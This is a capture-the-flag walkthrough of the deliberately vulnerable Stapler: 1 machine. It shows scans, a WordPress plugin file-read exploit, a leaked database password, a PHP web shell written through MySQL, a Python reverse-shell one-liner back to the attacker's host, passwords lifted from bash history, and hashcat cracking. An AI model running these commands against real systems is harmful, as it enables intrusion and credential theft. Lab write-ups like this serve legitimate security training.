Stapler: 1

Find target:

root@kali:~# nmap 172.16.219.0/24

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 09:26 PST

Nmap scan report for 172.16.219.178
Host is up (0.00051s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 00:0C:29:5C:A2:AF (VMware)


Nmap done: 256 IP addresses (5 hosts up) scanned in 205.65 seconds

Scan the target:

root@kali:~# nmap -T4 -A -p- 172.16.219.178

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 11:14 PST
Nmap scan report for 172.16.219.178
Host is up (0.0014s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 13
|   Capabilities flags: 63487
|   Some Capabilities: ODBCClient, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, ConnectWithDatabase, DontAllowDatabaseTableColumn, LongPassword, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, InteractiveClient, LongColumnFlag, Support41Auth, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: Q\x08W%#oqB%J\x0F\x11    \x16,W\x1Fxad\x00
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
... ...

Host script results:
|_clock-skew: mean: 24s, deviation: 0s, median: 24s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED
|   Domain name: 
|   FQDN: red
|_  System time: 2018-01-25T19:16:19+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  24s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.25 seconds

Scan web. http://172.16.219.178 returned not found. dirb and nikto scan on that only found two files: .bashrc and .profile. Noted that 12380 port is open and runs Apache httpd service. So let's try dirb and nikto scan on 172.16.219.178:12380.

root@kali:~# dirb http://172.16.219.178:12380

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 25 11:26:54 2018
URL_BASE: http://172.16.219.178:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.219.178:12380/ ----

-----------------
END_TIME: Thu Jan 25 11:27:45 2018
DOWNLOADED: 4612 - FOUND: 0
root@kali:~# nikto -host 172.16.219.178:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.219.178
+ Target Hostname:    172.16.219.178
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time:         2018-01-25 11:28:21 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '172.16.219.178' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2018-01-25 11:30:10 (GMT-8) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Found two entries: '/admin112233/' and '/blogblog/'.

Browse to https://172.16.219.178:12380/blogblog and read the blogs. Note the WEEK1 blog:

I'm not familiar with WordPress plugins, after googled a little bit,

So let's navigate to https://172.16.219.178:12380/blogblog/wp-content/

Inside the plugins folder, there're some plugins.

In kali linux, you can use the searchsploit command to search the exploit databse.

root@kali:~# searchsploit advanced video
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
WordPress Plugin Advanced Video 1.0 - Local  | ./php/webapps/39646.py
--------------------------------------------- ----------------------------------

Edit the script, add library and updated the url:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

url = "https://172.16.219.178:12380/blogblog" # insert url to wordpress

Run the script in your local terminal and then navigate to uploads folder at https://172.16.219.178:12380/blogblog/wp-content/uploads/. Notice there's a picture. Download this picture and cat the content locally:

root@kali:~/Downloads# cat ../Desktop/1568214632.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

Yeahhhh!! We have table name, username, and password! Connect to the remote mysql server:

root@kali:~/Desktop# mysql -h 172.16.219.178 -u root -p wordpress
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select database();
+------------+
| database() |
+------------+
| wordpress  |
+------------+
1 row in set (0.00 sec)

mysql> select table_name from information_schema.tables where table_schema='wordpress';
+-----------------------+
| table_name            |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.00 sec)

mysql> select column_name from information_schema.columns where table_schema='wordpress' and table_name='wp_users';
+---------------------+
| column_name         |
+---------------------+
| ID                  |
| user_login          |
| user_pass           |
| user_nicename       |
| user_email          |
| user_url            |
| user_registered     |
| user_activation_key |
| user_status         |
| display_name        |
+---------------------+
10 rows in set (0.00 sec)

mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/blogblog/wp-content/uploads/sh.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/blogblog/wp-content/uploads/sh.php' (Errcode: 2 - No such file or directory)
mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/sh.php";
Query OK, 1 row affected (0.00 sec)


mysql>

Now use a reverse shell to establish tcp connection. I used the Python reverse shell listed in this page: https://highon.coffee/blog/reverse-shell-cheat-sheet/

Inside kali run nc -lvp 80 and in browser navigate to:

https://172.16.219.178:12380/blogblog/wp-content/uploads/sh.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("myKali-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now we have the shell.

root@kali:# nc -lvp 80
listening on [any] 80 ...
172.16.219.178: inverse host lookup failed: Unknown host
connect to [172.16.219.177] from (UNKNOWN) [172.16.219.178] 46008
/bin/sh: 0: can't access tty; job control turned off
$ ls
1568214632.jpeg
228062103.jpeg
560193514.jpeg
651071434.jpeg
679463507.jpeg
85777840.jpeg
exp.php
exp2.php
exp3.php
sh.php
shell.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Tried spawning a tty shell but nothing happened.(Spawning a TTY Shell) Let's see users in the system to see if we can find useful info.

$ ls /home
ls /home
AParnell  Drew          JBare    LSolum2    RNunemaker  Sam     jess   www
CCeaser   ETollefson  JKanode  MBassin    SHAY        Taylor  kai    zoe
CJoo      Eeth          JLipps   MFrei    SHayslett   elly    mel
DSwanger  IChadwick   LSolum   NATHAN    SStroud     jamie   peter
$ ls -al AParnell
ls -al AParnell
total 24
drwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile
$ cat AParnell/.bash_history
cat AParnell/.bash_history
exit
... ...
$ cat JKanode/.bash_history
cat JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
$

After looking into each user's directory, I found JKanode's and peter's ssh pass!

Check peter's home directory:

$ ls -la peter
ls -la peter
total 72
drwxr-xr-x  3 peter peter  4096 Jun  3  2016 .
drwxr-xr-x 32 root  root   4096 Jun  4  2016 ..
-rw-------  1 peter peter     1 Jun  5  2016 .bash_history
-rw-r--r--  1 peter peter   220 Jun  3  2016 .bash_logout
-rw-r--r--  1 peter peter  3771 Jun  3  2016 .bashrc
drwx------  2 peter peter  4096 Jun  6  2016 .cache
-rw-r--r--  1 peter peter   675 Jun  3  2016 .profile
-rw-r--r--  1 peter peter     0 Jun  3  2016 .sudo_as_admin_successful
-rw-------  1 peter peter   577 Jun  3  2016 .viminfo
-rw-rw-r--  1 peter peter 39206 Jun  3  2016 .zcompdump
$

It seems like peter's home directory is more interesting. So I'll try to ssh via peter's creds.

Alternatively, after got the sql creds, I tried to crack the user_pass.

mysql> select user_pass from wp_users into outfile "/var/www/https/blogblog/wp-content/uploads/pass.txt";
Query OK, 16 rows affected (0.00 sec)

mysql>

Put the hashes into one file and use hashcat to crack them, got the following result:

root@kali:~/Downloads# hashcat -m 400 h.txt /usr/share/wordlists/rockyou.txt --force
hashcat (pull/1273/head) starting...

OpenCL Platform #1: The pocl project
... ...

$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1:football               
$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1:cookie                 
$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0:monkey                 
$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0:coolgirl

Use the pass and corresponding username to authenticate to https://172.16.219.178:12380/blogblog/wp-admin/

Then upload the shell to hack.

results matching ""

    No results matching ""